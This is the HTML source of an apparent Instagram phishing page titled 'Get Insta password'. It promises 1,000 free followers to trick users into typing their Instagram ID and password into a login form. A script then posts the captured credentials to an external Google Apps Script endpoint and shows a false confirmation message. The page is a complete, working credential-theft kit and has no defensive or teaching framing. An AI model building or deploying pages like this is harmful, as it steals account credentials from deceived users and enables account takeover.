<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Get Insta password</title>
</head>
<style >
	*{
		padding: 0px;
		margin: 0px;
	}
	.main{
		width: 100%;
		height: 100vh;
		background:#fff;
	}

	.main h1 {
		text-align: center;
		padding-top: 40px;

	}
	.para{
		width: 350px;
		margin-left: 100px;
		font-size: 16px;
		font-weight: 600px;
		margin-top: 120px;
	}

	.para b {
		font-size: 35px;
		font-weight: 100px;
	}

	.login{
		width: 350px;
		height: 400px;
		background: whitesmoke;
		margin-left: 750px;
		position: absolute;
		top: 150px;
		border: 1px solid black;
		border-radius: 15px;
	}

	form input{
	width: 250px;
	border: 0px;
	outline: none;
	background: white;
	padding: 15px;
	margin: 15px 0px;
	color: black;
	font-size: 18px;
	border-radius: 6px;
	margin-left: 35px;
	}

	.btn{

            border-top: 0.5px solid rgba(255, 255,255, 0.35);
			border-left: 0.5px solid rgba(255, 255,255, 0.35);
	        border-bottom: 0.5px solid rgba(255, 255,255, 0.35);
			border-right: 0.5px solid rgba(255, 255,255, 0.35);
			width: 150px;
			height: 50px;
			margin-left: 100px;
			background-color: #ff004f;
			border-radius: 60px;
			display: flex;
			justify-content: center;
			align-items: center;
			color: #fff;
			text-decoration: none;
			letter-spacing: 2px;
			cursor: pointer;
}
	








</style>
<body>
	<div class="main">
		<h1><i>Instagram Followers</i></h1>
		<p class="para"><b>Hello Everyone</b> 
			<br>
			<br>
			I have a special offer of every new user on instagram<br> who want to grow on instagram and get fast follower. <br>I give you 1k followers free because this platform is new. <br>If you want followers follow these steps:
			<br>
			<br>
			 1. You have only one chance to login <br> &nbsp; &nbsp; Please confirm your password
			 <br>
			 <br>
			 2.  1 To 3 hours you receive mssg on whatsapp for confirmation 
			 <br>
			 <br>
			 3. After this process you get 1k followers
		</p>

		<div class="login">

			<form method="post" action="" name="instagram">

				<h1>Login </h1>
				<br>
				<br>
				<input type="userid" name="userid" placeholder="Enter Insta Id" required>
				<br>
				
				<input type="Password" name="Password" placeholder="Enter Password...." required>
				<br>
				<br>
				<button class="btn" type="submit">Submit</button>
			</form>
		</div>
	




	</div>


<script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbwcAecVfDxYmWr1UCP6HKEYt4DosYPKN81_cPCeDf08U40G1IeplTUhoKNCgxm6dv68/exec'
        const form = document.forms['instagram']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => alert("Thank you! your form is submitted successfully." ))
            .then(() => {  window.location.reload(); })
            .catch(error => console.error('Error!', error.message))
        })
      </script>



</body>
</html>